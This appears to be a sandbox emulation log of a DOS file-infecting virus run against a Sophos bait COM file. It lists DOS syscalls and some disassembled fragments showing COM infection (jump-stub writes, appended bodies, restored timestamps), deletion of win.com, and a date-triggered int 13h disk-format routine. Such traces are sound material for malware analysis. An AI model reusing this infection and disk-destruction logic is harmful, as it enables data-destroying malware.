2018-12-25T12:22:20.508905603Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.512468852Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.522911631Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.526431308Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.533976786Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.543387907Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.547999614Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.556037225Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.564309931Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.567333644Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.57141596Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.581643796Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.585536179Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.594573249Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.605806914Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.609950407Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.617696238Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.625501786Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.627881913Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.634105654Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.643566239Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.6456961Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.655547108Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.666750349Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.670746223Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.679903825Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.688036817Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.690103459Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.699755558Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.70929458Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.711045162Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.715070471Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.725012987Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.732737146Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.734881772Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.742081151Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:19.293697204Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:19.295404868Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:19.304326773Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:19.306338701Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:19.307225367Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:19.311484067Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.31860245Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:19.320149487Z 62 PC: 148d3 | Close file
2018-12-25T12:22:19.322352448Z 79 PC: 148db | Find next file
2018-12-25T12:22:19.324994175Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.332079135Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.333995447Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.335310021Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.337140485Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.351515667Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.352932396Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.354695443Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.357921544Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.364977051Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.366356507Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.368549891Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.37139394Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.37858353Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.380188544Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.382758752Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.385442118Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.392480808Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.394248598Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.395655323Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.397871931Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.40245058Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.403751125Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.405000652Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.407503802Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.41763353Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.418809419Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:19.420334042Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.424765804Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.426000458Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.428063134Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:19.431051035Z 62 PC: 148b0 | Close file
2018-12-25T12:22:19.433108204Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:19.436186317Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:19.441532447Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:19.443154898Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:19.447684177Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:19.454690389Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.467402292Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:19.47449794Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:19.476162165Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:19.47878582Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:19.48036587Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:19.766453734Z 62 PC: 14659 | Close file
2018-12-25T12:22:19.774779143Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:19.780819109Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:20.139934548Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:20.142889432Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:20.14476959Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:20.149050619Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:20.150608854Z 78 PC: 14447 | Find first file
2018-12-25T12:22:20.159064747Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.167911228Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:20.175905999Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.187386452Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.194682486Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:20.196973767Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:20.199951756Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.203456355Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:20.205760609Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:20.214990298Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:20.217655403Z 59 PC: 144ee | Change current directory
2018-12-25T12:22:20.22481307Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:20.226814831Z 62 PC: 14504 | Close file
2018-12-25T12:22:20.236147671Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:20.248704172Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:20.253294623Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:20.255070137Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:20.257413464Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:20.259268479Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:20.260796552Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:20.264589366Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:20.269559968Z 62 PC: 1434c | Close file
2018-12-25T12:22:20.271481447Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:20.273831505Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:20.276470881Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:20.278077713Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:20.279676603Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:20.282295635Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:20.289673764Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:20.296942772Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:20.308823491Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.316931604Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:20.318854768Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:20.322397825Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.326470119Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.328371475Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.337788999Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.340552952Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.344063819Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.346143357Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.357050579Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.368841473Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.370627083Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.373114117Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.380354309Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.388056658Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.392049988Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.394254319Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.398142402Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.407583259Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.410213374Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.413571321Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.422759082Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.426938271Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.435166242Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.442496368Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.445182651Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.448694834Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.451994326Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.454546844Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.457992448Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.466680712Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.470058213Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.478325202Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.485673769Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.487534448Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.491761059Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.501329137Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.503174394Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.511546013Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.521124089Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.524359366Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.540678159Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.548096416Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.550078317Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.553921554Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.563757639Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.565666088Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.573789142Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.58313241Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.58643292Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.594995858Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.603186803Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.60516688Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.609303907Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.618685753Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.620629216Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.629305363Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.638652083Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.641977324Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.649983784Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.65834794Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.66031111Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.664430594Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.674599929Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.676602327Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.685078972Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.696968605Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.700375677Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.708092055Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.716724497Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.718734406Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.722106902Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.732264274Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.734238438Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.741952786Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.752488175Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.756650395Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.76486293Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.773398835Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.775679232Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.783923712Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.793988999Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.796341156Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.799931408Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.810406121Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.816020167Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.819876762Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.827913702Z 0 PC: 12a89 | Program terminate